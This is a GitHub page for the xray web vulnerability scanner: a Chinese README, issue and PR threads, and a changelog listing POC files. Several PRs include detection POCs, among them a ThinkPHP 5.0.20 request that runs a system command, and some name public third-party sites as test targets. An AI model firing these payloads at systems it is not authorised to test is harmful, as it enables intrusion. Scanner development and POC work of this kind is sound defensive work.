一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档

Overview

Welcome to xray 👋

Documentation

一款功能强大的安全评估工具

Demo

🏠 使用文档 ⬇️ 下载地址

注意:xray 不开源,直接下载构建的二进制文件即可,仓库内主要为社区贡献的 poc,每次 xray 发布将自动打包。

🚀 快速使用

在使用之前,请务必阅读并同意 License 文件中的条款,否则请勿安装使用本工具。

  1. 使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描

    xray webscan --basic-crawler http://example.com --html-output vuln.html
  2. 使用 HTTP 代理进行被动扫描

    xray webscan --listen 127.0.0.1:7777 --html-output proxy.html

    设置浏览器 http 代理为 http://127.0.0.1:7777,就可以自动分析代理流量并扫描。

    如需扫描 https 流量,请阅读下方文档 抓取 https 流量 部分

  3. 只扫描单个 url,不使用爬虫

    xray webscan --url http://example.com/?a=b --html-output single-url.html
  4. 手动指定本次运行的插件

    默认情况下,将会启用所有内置插件,可以使用下列命令指定本次扫描启用的插件。

    xray webscan --plugins cmd-injection,sqldet --url http://example.com
    xray webscan --plugins cmd-injection,sqldet --listen 127.0.0.1:7777
  5. 指定插件输出

    可以指定将本次扫描的漏洞信息输出到某个文件中:

    xray webscan --url http://example.com/?a=b \
    --text-output result.txt --json-output result.json --html-output report.html

    报告样例

其他用法请阅读文档: https://docs.xray.cool

🛠 检测模块

新的检测模块将不断添加

  • XSS漏洞检测 (key: xss)

    利用语义分析的方式检测XSS漏洞

  • SQL 注入检测 (key: sqldet)

    支持报错注入、布尔注入和时间盲注等

  • 命令/代码注入检测 (key: cmd-injection)

    支持 shell 命令注入、PHP 代码执行、模板注入等

  • 目录枚举 (key: dirscan)

    检测备份文件、临时文件、debug 页面、配置文件等10余类敏感路径和文件

  • 路径穿越检测 (key: path-traversal)

    支持常见平台和编码

  • XML 实体注入检测 (key: xxe)

    支持有回显和反连平台检测

  • poc 管理 (key: phantasm)

    默认内置部分常用的 poc,用户可以根据需要自行构建 poc 并运行。文档:https://docs.xray.cool/#/guide/poc

  • 文件上传检测 (key: upload)

    支持常见的后端语言

  • 弱口令检测 (key: brute-force)

    社区版支持检测 HTTP 基础认证和简易表单弱口令,内置常见用户名和密码字典

  • jsonp 检测 (key: jsonp)

    检测包含敏感信息可以被跨域读取的 jsonp 接口

  • ssrf 检测 (key: ssrf)

    ssrf 检测模块,支持常见的绕过技术和反连平台检测

  • 基线检查 (key: baseline)

    检测低 SSL 版本、缺失的或错误添加的 http 头等

  • 任意跳转检测 (key: redirect)

    支持 HTML meta 跳转、30x 跳转等

  • CRLF 注入 (key: crlf-injection)

    检测 HTTP 头注入,支持 query、body 等位置的参数

  • Struts2 系列漏洞检测 (高级版,key: struts)

    检测目标网站是否存在Struts2系列漏洞,包括s2-016、s2-032、s2-045等常见漏洞

  • Thinkphp系列漏洞检测 (高级版,key: thinkphp)

    检测ThinkPHP开发的网站的相关漏洞

  • ..

⚡️ 进阶使用

下列高级用法请查看 https://docs.xray.cool/ 使用。

  • 修改配置文件
  • 抓取 https 流量
  • 修改 http 发包配置
  • 反连平台的使用
  • ...

😘 贡献 POC

参照: https://docs.xray.cool/#/guide/contribute

📝 讨论区

提交误报漏报需求等等请务必先阅读 https://docs.xray.cool/#/guide/feedback

如有问题可以在 GitHub 提 issue, 也可在下方的讨论组里

  1. GitHub issue: https://github.com/chaitin/xray/issues
  2. QQ 群: 717365081
  3. 微信群: 扫描以下二维码关注 xray 公众号,点击菜单加群,按照提示进行操作即可。

Comments
  • 1.9.3 反连报错

    1.9.3 反连报错

    使用的独立部署的反连平台,而且根本没有配置dns反连接, dns_server_ip: "" 同样的配置文件再1.8版本没有报错,在这个版本每次运行都要不停的报错 [ERRO] [runner client:reverse.go:20] got domain error, reverse/client config dns_server_ip is empty

    opened by zerokeeper 13
  • 74cms-sqli-2

    74cms-sqli-2

    本 poc 是检测什么漏洞的

    检测骑士CMS V3.4.20140530 /plus/ajax_officebuilding.php文件是否存在SQL注入漏洞

    测试环境

    http://www.cnxxrcw.cn/

    备注

    由于该74cms版本比较老,很难搭建本地环境,在公网上找到一个复现漏洞的靶机。另外在PR里也有74cms的poc,测试环境与此一样。

    opened by SecReXus 13
  • 一些功能增强建议

    一些功能增强建议

    0x00 json输出格式问题

    json能一行一行输出么?现在的--json-output是json展开了,并且开始是[,每个json连接有个,,如果监控json文件结果,不好处理,查看结果,jq 也不好查看. 如果一行一个json,不用展开就是最好滴.

    0x01 headers问题

    现在只能预制1个header,在mitm原始流量和xray扫描流量容易混合了。在后面的nginx lua上不好做规则。mitm和scan流量能分别设置headers么。这样就容易区分了。 所以,建议config.yml中2处headers自定义配置. mitm的,扫描的.

    0x02 webhook功能

    扫描成功后,带上原始json,向指定url发送一个post请求,那就是最好滴.

    0x03 reverse功能

    是否后期可能对接dnslog平台呢? 或者对齐下格式,dnslog平台异步打个请求回来。

    0x04 http代理问题

    能否兼容下proxychains(ng)等工具的http代理. (换个代理库可能就好了. 比如v2ray-core之类的兼容性好) 比如proxychains4 python soft.py把流量导入xray

    opened by tuian 12
  • 关于 poc 逻辑分支

    关于 poc 逻辑分支

    讨论一下,是否有必要支持 poc 的逻辑分支,按现在对xray的了解,poc只能向下执行,遇到expression为false则退出

    考虑一种特殊情况,某一个漏洞,需要发两个包,第一个包有三种情况,其中两种是漏洞存在 第二个包在漏洞存在的基础上,根据不同响应执行不同请求

    如果没有逻辑分支,此时需要写两个poc,而两个poc最多需要请求四次才能验证漏洞是否存在,而且至少会请求两次

    如果加入逻辑分支,则请求次数会降低为最少一次最多两次,在请求次数上产生了优化

    其次则是符合了一个漏洞一个poc的原则,在poc提交上显得相对完善

    此外,对于逻辑分支而言,除了if switch的实现方法之外,实际上只需要支持三元表达式和expression赋值,就可以实现一个比较hack的逻辑分支,考虑下面的伪代码

    expression: response == 200 && set(value = test1) || response == 201 && set(value = test2) || response == 202 && set(value = test3)
    ...
    path: {{!! value == test1 ? '/param1' : (value == test2 ? '/prarm2' : '/param3') !!}}
    
    

    这种实现方式在需要的请求数增加时,会显得混乱,因为没有明确的指出上上级,不过混乱的问题也可以通过动态赋值近似解决,比如设置流程路径为 001 011等,但完整的分支逻辑也许是更好的解决方案

    如有对poc流程理解不正确的,还请指正

    opened by hundan2020 11
  • Add jira-ssrf-cve-2019-8451 POC

    Add jira-ssrf-cve-2019-8451 POC

    本 poc 是检测什么漏洞的

    检测Jira未授权SSRF漏洞(CVE-2019-8451)

    测试环境

    补充一下测试环境的搭建

    sudo docker pull cptactionhank/atlassian-jira:7.8.0
    sudo docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0
    

    之后注册一个 Atlassian 的账号申请试用 lisence 按引导进行配置即可。

    备注

    本地测试截图: image

    image

    opened by shmilylty 9
  • Create poc-yaml-HTTP.SYS-MS15-034-RCE

    Create poc-yaml-HTTP.SYS-MS15-034-RCE

    Summary

    what POC is this PR for? poc-yaml-HTTP.SYS-MS15-034-RCE

    POC

    name: poc-yaml-HTTP.SYS-MS15-034-RCE
    rules:
      - method: GET
        path: /
        headers:
          User-Agent: >-
            Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36
            (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
          Range: bytes=0-18446744073709551615
        follow_redirects: true
        expression: status==416 && body.bcontains(b'Requested Range Not Satisfiable')
    

    Test Environment

    The vuln can be reproduced in the following docker environment.

    Dockerfile:

    http://107.167.27.251/
    

    Remarks

    Write you voice here.

    先搁置,暂时不好实现 
    opened by SkyZh47 8
  • tp5.0.20update

    tp5.0.20update

    Summary

    what POC is this PR for? thinkphp 5.0.20-rce

    POC

    name: poc-yaml-tp5.0.20
    rules:
      - method: GET
        path: >-
          /index.php?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20vulnerable
        follow_redirects: false
        expression: status==200 && body.bcontains(b'vulnerable')
    

    Test Environment

    http://39.105.202.187:8080 The vuln can be reproduced in the following docker environment.

    Dockerfile:

    
    

    Or docker-compose:

    version: '3'
    services:
     web:
       image: vulhub/thinkphp:5.0.20
       ports:
        - "8080:80"
    

    Remarks

    Write you voice here.

    opened by kurokoleung 8
  • create poc-yaml-zentao-php-api-sql

    create poc-yaml-zentao-php-api-sql

    请先确保符合以下几点要求

    • 阅读 poc 提交规范和要求 https://chaitin.github.io/xray/#/guide/contribute https://chaitin.github.io/xray/#/guide/high_quality_poc
    • 本 repo 中已经合并的和未合并的 pull request 中不含有相同的 poc,可以在网页端左上角搜索查看
    • 一个 pull request 尽量只提交一个 poc,否则可能审核和修改过程会互相影响
    • 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交,可以私聊群管理员
    • 下方的测试环境可以参考 vulhub vulnapps 。请勿直接填写公网上未修复的站点的地址,如果有特殊情况,请私聊解决。不接受没有测试环境的 poc
    • 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励,请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信,说明你的 poc 地址,方便发送奖励。

    我是分割线,在提交 poc 填写说明的时候,请务必阅读上方要求,然后删除本分割线和上方的内容,只保留下面自定义的部分即可,否则不予通过。


    本 poc 是检测什么漏洞的

    通达OA upload+rce

    测试环境

    windows server 2012 TDOA11.3.exe 下载链接:https://cdndown.tongda2000.com/oa/2019/TDOA11.3.exe

    备注

    调试通过,本地测试多次均验证通过。

    xray 执行: ./xray webscan --plugins phantasm --poc tongda-oa-rce.yml --url http://10.211.55.16

    opened by ppbibo 7
  • It does nothing

    It does nothing

    netikras@netikras-xps:~/received$ ./xray_linux_amd64 servicescan --target x.x.96.13:443
    
     __   __  _____              __     __
     \ \ / / |  __ \      /\     \ \   / /
      \ V /  | |__) |    /  \     \ \_/ / 
       > <   |  _  /    / /\ \     \   /  
      / . \  | | \ \   / ____ \     | |   
     /_/ \_\ |_|  \_\ /_/    \_\    |_|   
                                          
    
    Version: 0.19.2/532ab599/COMMUNITY
    
    [INFO] 2020-02-29 20:25:49 +0200 [default:single.go:334] wait for task done
    netikras@netikras-xps:~/received$ echo $?
    0
    netikras@netikras-xps:~/received$
    ```
    
    
    IP has been masked before posting the issue
    opened by netikras 7
  • magento2.2-sqli.yml

    magento2.2-sqli.yml

    请先确保符合以下几点要求

    • 阅读 poc 提交规范和要求 https://chaitin.github.io/xray/#/guide/contribute https://chaitin.github.io/xray/#/guide/high_quality_poc
    • 本 repo 中已经合并的和未合并的 pull request 中不含有相同的 poc,可以在网页端左上角搜索查看
    • 一个 pull request 尽量只提交一个 poc,否则可能审核和修改过程会互相影响
    • 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交,可以私聊群管理员
    • 下方的测试环境可以参考 vulhub vulnapps 。请勿直接填写公网上未修复的站点的地址,如果有特殊情况,请私聊解决。不接受没有测试环境的 poc
    • 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励,请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信,说明你的 poc 地址,方便发送奖励。

    我是分割线,在提交 poc 填写说明的时候,请务必阅读上方要求,然后删除本分割线和上方的内容,只保留下面自定义的部分即可


    本 poc 是检测什么漏洞的

    sql注入

    测试环境

    magento

    备注

    author: lnk23y links:https://github.com/vulhub/vulhub/tree/master/magento/2.2-sqli

    opened by hanxiansheng26 7
  • Add files via upload

    Add files via upload


    本 poc 是检测什么漏洞的

    Joomla! configuration.php文件RCE漏洞( CNVD-2019-34135 )

    测试环境

    https://downloads.joomla.org/it/cms/joomla3/3-4-6 搭建测试即可

    备注

    不要默认配置带的cookie,否则可能检测不出

    opened by 615 7
  • Crawling POST Parameters

    Crawling POST Parameters

    Hello Developers,,

    The Tool is great after many scans I've discover and be sure that the tool not crawl all parameters in pages specially the "parameters" in the "Filter Categories" most of this "Filters" are with POST requests

    Here a live example for the Filter Categories

    Step 1 https://i.ibb.co/0KNTH20/1.png

    Step 2 https://i.ibb.co/y69q7x7/2.png

    Step 3 https://i.ibb.co/YpD7vWJ/3.png

    Hope my explain is clear and I hope the developer's find a solution to fix the crawl techniques to make the tool Crawl like this POST requests to make the tool extract more "parameters"

    Best Regards,, and keep this tool UP!

    opened by Moskitoz 1
  • dirscan admin 扫描重复结果

    dirscan admin 扫描重复结果

    dirscan/admin/default 扫描会出现不同后缀的结果 好像也是1.9.x新版本的问题,之前1.8.x的版本没发现这个问题

    https://example.com/admin.html
    https://example.com/admin.jsp
    https://example.com/admin.do
    https://example.com/admin.asp
    https://example.com/admin
    https://example.com/admin/
    
    bug 
    opened by zerokeeper 3
  • Bump express from 4.17.1 to 4.18.2 in /report

    Bump express from 4.17.1 to 4.18.2 in /report

    Bumps express from 4.17.1 to 4.18.2.

    Release notes

    Sourced from express's releases.

    4.18.2

    4.18.1

    • Fix hanging on large stack of sync routes

    4.18.0

    ... (truncated)

    Changelog

    Sourced from express's changelog.

    4.18.2 / 2022-10-08

    4.18.1 / 2022-04-29

    • Fix hanging on large stack of sync routes

    4.18.0 / 2022-04-25

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 0
  • Bump qs from 6.5.2 to 6.5.3 in /report

    Bump qs from 6.5.2 to 6.5.3 in /report

    Bumps qs from 6.5.2 to 6.5.3.

    Changelog

    Sourced from qs's changelog.

    6.5.3

    • [Fix] parse: ignore __proto__ keys (#428)
    • [Fix] utils.merge: avoid a crash with a null target and a truthy non-array source
    • [Fix] correctly parse nested arrays
    • [Fix] stringify: fix a crash with strictNullHandling and a custom filter/serializeDate (#279)
    • [Fix] utils: merge: fix crash when source is a truthy primitive & no options are provided
    • [Fix] when parseArrays is false, properly handle keys ending in []
    • [Fix] fix for an impossible situation: when the formatter is called with a non-string value
    • [Fix] utils.merge: avoid a crash with a null target and an array source
    • [Refactor] utils: reduce observable [[Get]]s
    • [Refactor] use cached Array.isArray
    • [Refactor] stringify: Avoid arr = arr.concat(...), push to the existing instance (#269)
    • [Refactor] parse: only need to reassign the var once
    • [Robustness] stringify: avoid relying on a global undefined (#427)
    • [readme] remove travis badge; add github actions/codecov badges; update URLs
    • [Docs] Clean up license text so it’s properly detected as BSD-3-Clause
    • [Docs] Clarify the need for "arrayLimit" option
    • [meta] fix README.md (#399)
    • [meta] add FUNDING.yml
    • [actions] backport actions from main
    • [Tests] always use String(x) over x.toString()
    • [Tests] remove nonexistent tape option
    • [Dev Deps] backport from main
    Commits
    • 298bfa5 v6.5.3
    • ed0f5dc [Fix] parse: ignore __proto__ keys (#428)
    • 691e739 [Robustness] stringify: avoid relying on a global undefined (#427)
    • 1072d57 [readme] remove travis badge; add github actions/codecov badges; update URLs
    • 12ac1c4 [meta] fix README.md (#399)
    • 0338716 [actions] backport actions from main
    • 5639c20 Clean up license text so it’s properly detected as BSD-3-Clause
    • 51b8a0b add FUNDING.yml
    • 45f6759 [Fix] fix for an impossible situation: when the formatter is called with a no...
    • f814a7f [Dev Deps] backport from main
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 0
  • Bump decode-uri-component from 0.2.0 to 0.2.2 in /report

    Bump decode-uri-component from 0.2.0 to 0.2.2 in /report

    Bumps decode-uri-component from 0.2.0 to 0.2.2.

    Release notes

    Sourced from decode-uri-component's releases.

    v0.2.2

    • Prevent overwriting previously decoded tokens 980e0bf

    https://github.com/SamVerschueren/decode-uri-component/compare/v0.2.1...v0.2.2

    v0.2.1

    • Switch to GitHub workflows 76abc93
    • Fix issue where decode throws - fixes #6 746ca5d
    • Update license (#1) 486d7e2
    • Tidelift tasks a650457
    • Meta tweaks 66e1c28

    https://github.com/SamVerschueren/decode-uri-component/compare/v0.2.0...v0.2.1

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 0
Releases(1.9.3)
  • 1.9.3(Oct 14, 2022)

    1. 做了一些优化
      1. 优化扫描效率
      2. 增强子域名收集功能
    2. 增加了一些功能
      1. 添加burp的history导出文件转yml脚本的功能
      2. log4j2-rce的检测
      3. 为自定义脚本(gamma)添加
        1. 格式化时间戳函数
        2. 进制转换函数
        3. sha,hmacsha函数
        4. url全字符编码函数
        5. rev 字符串反向函数
        6. 添加 upper 字符串大写函数
        7. dir()
        8. basename()
        9. body_string
        10. title_string
      4. 扫描时,可以指定POC的危害等级,分为low,medium,high,critical,通过--level参数指定
      5. 为shiro插件添加文件加载功能,可以直接加载指定文件中的key
      6. 可在配置文件中配置每个poc的标签,通过--tags来指定标签扫描
      7. 更新了--list功能,可查看相关标签对应poc
      8. 为 response 添加 icon_url 属性
    3. 修复了一些问题
      1. 修复cve-2021-29490误报严重问题
      2. 修复报告只显示参考链接,不显示提交者的问题
      3. 修复cache可能出现的请求不发送问题
      4. 过滤部分冗余的错误日志
      5. 修复一些意外导致panic的问题
    4. 新增x命令
      1. 支持对发现的web站点进行漏洞探测
      2. 支持带宽控制与智能速率调节,最优化扫描效率
      3. 支持多目标多端口随机探测,基于有限元的随机化方案
      4. 支持ICMP/TCP/UDP主机存活探测
      5. 支持SYN/CONNECT端口扫描
      6. 支持URL/IP/域名/IP范围/CIDR等多种输入方式
      7. 支持指纹识别
    • 该命令实际上是xray内置的、启用了

      • printer
      • service-scan
      • target-parse

    这三个内置的插件的命令。

    其中service-scan提供主机存活探测服务指纹识别web指纹识别 的功能

    可以查看 plugin-config.xray.yaml,module-config.xray.yaml获得详细配置信息,执行xray x --help 获取命令行参数与试用方法。

    示例:

    xray x -t example.com
    xray x -t http://example.com
    xray x -t example.com/24
    xray x -t 192.168.1.1/24
    xray x -t 192.168.1.1-192.168.1.254
    xray x -t 192.168.1.1-254
    xray x -t 192.168.1.1-254 -p 22,80,443-445
    
    1. 新增385个poc,感谢师傅们的提交,更新后即可自动加载
      • vmware-vcenter-cve-2021-21985-rce.yml
      • 74cms-cnvd-2021-45280.yml
      • adobe-coldfusion-cve-2018-15961.yml
      • ametys-cms-cve-2022-26159.yml
      • anmei-rce.yml
      • apache-airflow-cve-2020-13927-unauthorized.yml
      • apache-apisix-dashboard-api-unauth-rce.yml
      • atlassian-jira-unauth-user-enumeration.yml
      • auerswald-cve-2021-40859.yml
      • clickhouse-http-unauth.yml
      • cve-2022-24990-terramaster-fileupload.yml
      • dedecms-cve-2017-17731-sqli.yml
      • dedecms-mysql-error-trace.yml
      • dedecms-search-php-sqli.yml
      • doccms-sqli.yml
      • earcms-download-php-exec.yml
      • earcms-index-uplog-php-file-upload.yml
      • emlog-cve-2021-3293.yml
      • ewebs-fileread.yml
      • eyoucms-cve-2021-39501.yml
      • ezoffice-smartupload-jsp-upload.yml
      • finecms-getshell.yml
      • full-read-ssrf-in-spring-cloud-netflix.yml
      • grafana-snapshot-cve-2021-39226.yml
      • hadoop-yarn-rpc-rce.yml
      • hikvision-readfile.yml
      • hongfan-oa-readfile.yml
      • interlib-read-file.yml
      • ivanti-endpoint-manager-cve-2021-44529-rce.yml
      • jinhe-oa-readfile.yml
      • joomla-jck-cve-2018-17254-sqli.yml
      • kingdee-oa-apusic-readfile.yml
      • landray-oa-rce.yml
      • lionfish-cms-image-upload-php-upload.yml
      • lionfish-cms-wxapp-php-upload.yml
      • mastodon-cve-2022-0432.yml
      • metersphere-plugincontroller-rce.yml
      • metinfo-x-rewrite-url-sqli.yml
      • movabletype-cve-2021-20837-rce.yml
      • netpower-readfile.yml
      • nette-framework-cve-2020-15227-rce.yml
      • nginx-path-traversal.yml
      • oa8000-workflowservice-sqli.yml
      • onethink-sqli.yml
      • php-chat-live-uploadimg-html-upload.yml
      • phpcms-960-sqli.yml
      • phpweb-appplus-php-upload.yml
      • pigcms-file-upload.yml
      • prestashop-smartblog-cve-2021-37538.yml
      • qibocms-readfile.yml
      • rudloff-alltube-cve-2022-0692.yml
      • seeyon-oa-a6-information-disclosure.yml
      • spring-cloud-gateway-cve-2022-22947-rce.yml
      • supesite-sqli.yml
      • sysaid-itil-cve-2021-43972.yml
      • tongda-oa-action-upload-php-upload.yml
      • tongda-oa-report-bi-func-php-sqli.yml
      • voipmonitor-cve-2022-24260.yml
      • wanhuoa-upload-rce.yml
      • weaver-e-office-lazyuploadify-upload.yml
      • weaver-oa-eoffice-information-disclosure.yml
      • weijiaoyi-post-curl-ssrf.yml
      • western-digital-mycloud-ftp-download-exec.yml
      • western-digital-mycloud-jqueryfiletree-exec.yml
      • western-digital-mycloud-multi-uploadify-file-upload.yml
      • western-digital-mycloud-raid-cgi-exec.yml
      • western-digital-mycloud-sendlogtosupport-php-exec.yml
      • western-digital-mycloud-upload-php-exec.yml
      • western-digital-mycloud-upload-php-upload.yml
      • yonyou-erp-nc-readfile.yml
      • zhixiang-oa-sqli.yml
      • zoho-cve-2022-23779-info-leak.yml
      • adobe-coldfusion-cve-2021-21087.yml
      • alibaba-anyproxy-fetchbody-fileread.yml
      • apache-apisix-cve-2020-13945-rce.yml
      • apache-guacamole-default-password.yml
      • atlassian-jira-cve-2019-3403.yml
      • bsphp-unauthorized-access.yml
      • cve-2017-16894-sensitive-documents.yml
      • delta-entelitouch-cookie-user-password-disclosure.yml
      • domoticz-cve-2019-10664.yml
      • druid-cve-2021-25646.yml
      • dynamicweb-cve-2022-25369.yml
      • egroupware-spellchecker-rce.yml
      • elfinder-cve-2021-32682-rce.yml
      • emerge-e3-cve-2019-7256.yml
      • essl-dataapp-unauth-db-leak.yml
      • finecms-cve-2018-6893.yml
      • franklinfueling-cve-2021-46417-lfi.yml
      • fuelcms-cve-2018-16763-rce.yml
      • genixcms-register-cve-2015-3933-sqli.yml
      • getsimple-cve-2019-11231.yml
      • ghostscript-cve-2018-19475-rce.yml
      • jetty-servlets-concatservlet-information-disclosure-cve-2021-28169.yml
      • jetty-web-inf-information-disclosure-cve-2021-34429.yml
      • jira-cve-2021-26086.yml
      • joomla-history-cve-2015-7857-sqli.yml
      • jquery-picture-cut-upload-php-fileupload-cve-2018-9208.yml
      • jsrog-artifactory-cve-2019-9733.yml
      • kibana-cve-2019-7609-rce.yml
      • kodexplorer-directory-traversal.yml
      • maccms-cve-2017-17733-rce.yml
      • metabase-cve-2021-41277.yml
      • nostromo-cve-2011-0751-directory-traversal.yml
      • nuxeo-cve-2018-16341-rce.yml
      • odoo-cve-2019-14322.yml
      • php-imap-cve-2018-19518-rce.yml
      • phpmoadmin-cve-2015-2208-rce.yml
      • piwigo-cve-2022-26266-sqli.yml
      • rconfig-ajaxserversettingschk-cve-2019-16662-rce.yml
      • rconfig-commands-inc-cve-2020-10220-sqli.yml
      • resin-directory-traversal-cve-2021-44138.yml
      • ruanhong-jvm-lfi.yml
      • ruanhong-oa-xxe.yml
      • ruckus-default-password.yml
      • seeyon-oa-a8-m-information-disclosure.yml
      • showdoc-cnvd-2020-26585.yml
      • socomec-cve-2019-15859.yml
      • spring-data-rest-cve-2017-8046-rce.yml
      • subrions-search-cve-2017-11444-sqli.yml
      • teclib-glpl-cve-2019-10232.yml
      • terramaster-tos-cve-2022-24989.yml
      • tibco-jasperreports-cve-2018-18809-directory-traversal.yml
      • tongda-oa-login-code-php-login-bypass.yml
      • twonkyserver-cve-2018-7171-fileread.yml
      • vmware-workspace-cve-2021-22054-ssrf.yml
      • vmware-workspace-cve-2022-22954-rce.yml
      • vtigercrm-cve-2020-19363.yml
      • weaver-ecology-getsqldata-sqli-rce.yml
      • wordpress-site-editor-cve-2018-7422-lfi.yml
      • wso2-cve-2022-29464-fileupload.yml
      • wuzhicms-cve-2018-11528.yml
      • zabbix-cve-2019-17382.yml
      • zimbra-collaboration-server-cve-2013-7091-lfi.yml
      • zoneminder-cve-2016-10140-unauth-access.yml
      • apollo-default-password.yml
      • ecology-oa-eoffice-officeserver-php-file-read.yml
      • dptech-vpn-fileread.yml
      • ezoffice-filupload-controller-getshell.yml
      • yachtcontrol-webapplication-cve-2019-17270.yml
      • atlassian-jira-cve-2019-3401.yml
      • emerge-e3-cve-2019-7254.yml
      • vbulletin-cve-2020-12720.yml
      • netsweeper-webadmin-cve-2020-13167.yml
      • searchblox-cve-2020-35580.yml
      • opensis-cve-2020-6637.yml
      • hd-network-real-time-monitoring-system-cve-2021-45043.yml
      • visual-tools-dvr-vx16-cve-2021-42071.yml
      • jsrog-artifactory-cve-2019-17444.yml
      • reolink-RLC-410W-CVE-2022-21236.yml
      • tlr-2005ksh-cve-2021-45428.yml
      • zoho-manageengine-access-manager-plus-cve-2022-29081.yml
      • selea-ocr-anpr-arbitrary-get-file-read.yml
      • easyappointments-cve-2022-0482.yml
      • netgear-ssl-vpn-20211222-cve-2022-29383.yml
      • hitachi-vantara-pentaho-business-analytics-cve-2021-34684.yml
      • manageengine-opmanager-cve-2020-11946.yml
      • intelbras-wireless-cve-2021-3017.yml
      • sapido-router-unauthenticated-rce.yml
      • china-telecom-zte-f460-rce.yml
      • china-mobile-yu-router-information-disclosure.yml
      • tlr-2855ks6-arbitrary-file-creation-cve-2021-46418.yml
      • uniview-isc-rce.yml
      • feiyuxing-route-wifi-password-leak.yml
      • changjie-crm-sqli.yml
      • fhem-file-read-cve-2020-19360.yml
      • hikvision-ip-camera-backdoor.yml
      • kyocera-file-read.yml
      • niushop-cms-sqli.yml
      • dlink-dap-1620-firmware-cve-2021-46381.yml
      • emby-mediaserver-cve-2020-26948.yml
      • zoho-manageengine-opmanager-cve-2020-12116.yml
      • zabbix-cve-2022-23134.yml
      • tieline-ip-audio-gateway-cve-2021-35336.yml
      • selea-ocr-anpr-arbitrary-seleacamera-file-read.yml
      • microweber-cve-2022-0378.yml
      • atlassian-jira-cve-2022-0540.yml
      • sophosfirewall-bypass.yml
      • zoho-manageengine-desktop-central-cve-2021-44515.yml
      • tenda-11n-ultra-vires.yml
      • tenda-w15e-passsword-leak.yml
      • ziguang-sqli-cnvd-2021-41638.yml
      • kemai-ras-ultra-vires.yml
      • cerebro-request-ssrf.yml
      • motioneye-info-leak-cve-2022-25568.yml
      • yinda-get-file-read.yml
      • jupyter-notebook-rce.yml
      • e-message-unauth.yml
      • kkfileview-cve-2021-43734.yml
